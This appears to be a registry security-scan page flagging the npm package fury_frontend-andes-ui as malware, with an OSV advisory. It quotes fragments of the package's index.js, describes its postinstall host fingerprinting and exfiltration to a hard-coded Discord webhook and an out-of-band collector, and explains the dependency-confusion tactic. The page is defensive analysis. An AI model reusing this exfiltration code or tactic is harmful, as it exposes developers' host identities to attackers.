registry  /  fury_frontend-andes-ui  /  99.9.6

fury_frontend-andes-ui@99.9.6

AI Security Review

scanned 3h ago · by lpm-firewall-ai

Installation triggers `node index.js` through `postinstall`. The script fingerprints the installing host and exfiltrates the data to a hard-coded Discord webhook.

Static reason
High-risk behavior combination matched malicious policy.
Trigger
npm package installation runs the `postinstall` lifecycle hook.
Impact
Unconsented disclosure of installer identity, host, network, and workspace-path metadata.
Mechanism
install-time host fingerprinting and Discord webhook exfiltration
Attack narrative
On installation, npm runs `node index.js`. The entrypoint gathers OS and architecture, hostname, local username, current directory, non-internal IPv4 addresses, and a public IP obtained from api.ipify.org. It serializes these values into a Discord embed and POSTs them to a hard-coded Discord webhook, without user action or consent.
Rationale
Direct source inspection confirms an install-time lifecycle hook that performs host fingerprinting and external exfiltration. This is concrete malicious behavior, not merely a suspicious primitive.
Evidence
package.jsonindex.js
Network endpoints2
api.ipify.org?format=jsondiscord.com/api/webhooks/1524917003394089029/ncpsW9dL3ppy5XImRUk_yC5LLlOaH3hgRAfrCq9MwEsuQnjiTA2RO_OO99Xx3AoG6pBH

OSV Corroboration

OpenSSF/OSV
Advisory
MAL-2026-10095
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in fury_frontend-andes-ui (npm)
Details
The package's postinstall hook auto-executes index.js on `npm install`. The script collects the installer's OS username (os.userInfo()), current working directory (process.cwd()), and external IPv4 address from network interfaces, then POSTs them as JSON to a hardcoded interactsh out-of-band collector at dodwqvexnkotaavogofbj9kjz5pltcu7b.oast.fun/receive-data. The package name mimics MercadoLibre's internal 'fury/andes-ui' naming convention and is published at version 99.9.5 to force resolution over any legitimate internal package with the same name — the standard dependency-confusion attack shape. The package ships no library functionality matching its name; its only effect on install is the identity beacon.

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • `package.json` defines `postinstall: node index.js`.
  • `index.js` executes an async collector immediately at import/execution.
  • `index.js` collects hostname, username, OS/architecture, working directory, private IPs, and public IP.
  • `index.js` POSTs collected host data to a hard-coded Discord webhook.
  • Public IP lookup is sent to `api.ipify.org` during installation.
Evidence against
  • Only `package.json` and `index.js` are present.
  • No file deletion, shell execution, persistence, or AI-agent control-surface mutation was found.
Behavioral surface
Source
Network
Supply chain
HighEntropyStringsUrlStrings
ManifestNo manifest risk signals triggered.
scanned 1 file(s), 2.12 KB of source, external domains: api.ipify.org, discord.com

Source & flagged code

4 flagged · loading source
package.jsonView file
scripts.postinstall = node index.js
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
index.jsView file
4const os = require("os"); L5: const packageJson = require("./package.json"); // Require your package.json L6: L7: const WEBHOOK_URL = "https://discord.[redacted]ncpsW9dL3ppy5XImRUk_yC5LLlOaH3hgRAfrCq9MwEsuQnjiTA2RO_OO99Xx3AoG6pBH"; L8: ... L10: function getPrivateIPs() { L11: return Object.values(os.networkInterfaces()) L12: .flat() ... L28: } L29: const data = await response.json(); L30: return data.ip; ... L52: headers: { "Content-Type": "application/json" },
Critical
Credential Exfiltration

Source appears to send environment or credential material to an external endpoint.

index.jsView on unpkg · L4
4Trigger-reachable chain: scripts.postinstall -> index.js L4: const os = require("os"); L5: const packageJson = require("./package.json"); // Require your package.json L6: L7: const WEBHOOK_URL = "https://discord.[redacted]ncpsW9dL3ppy5XImRUk_yC5LLlOaH3hgRAfrCq9MwEsuQnjiTA2RO_OO99Xx3AoG6pBH"; L8: ... L10: function getPrivateIPs() { L11: return Object.values(os.networkInterfaces()) L12: .flat() ... L28: } L29: const data = await response.json(); L30: return data.ip; ... L52: headers: { "Content-Type": "application/json" },
Critical
Trigger Reachable Dangerous Capability

A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

index.jsView on unpkg · L4
4const os = require("os"); L5: const packageJson = require("./package.json"); // Require your package.json L6: L7: const WEBHOOK_URL = "https://discord.[redacted]ncpsW9dL3ppy5XImRUk_yC5LLlOaH3hgRAfrCq9MwEsuQnjiTA2RO_OO99Xx3AoG6pBH"; L8: ... L10: function getPrivateIPs() { L11: return Object.values(os.networkInterfaces()) L12: .flat() ... L28: } L29: const data = await response.json(); L30: return data.ip; ... L52: headers: { "Content-Type": "application/json" },
High
Host Fingerprint Exfiltration

Source collects local host identity data and sends it to an external endpoint.

index.jsView on unpkg · L4

Findings

2 Critical2 High2 Medium3 Low
CriticalCredential Exfiltrationindex.js
CriticalTrigger Reachable Dangerous Capabilityindex.js
HighInstall Time Lifecycle Scriptspackage.json
HighHost Fingerprint Exfiltrationindex.js
MediumNetwork
MediumStructural Risk Force Deep Review
LowScripts Present
LowHigh Entropy Strings
LowUrl Strings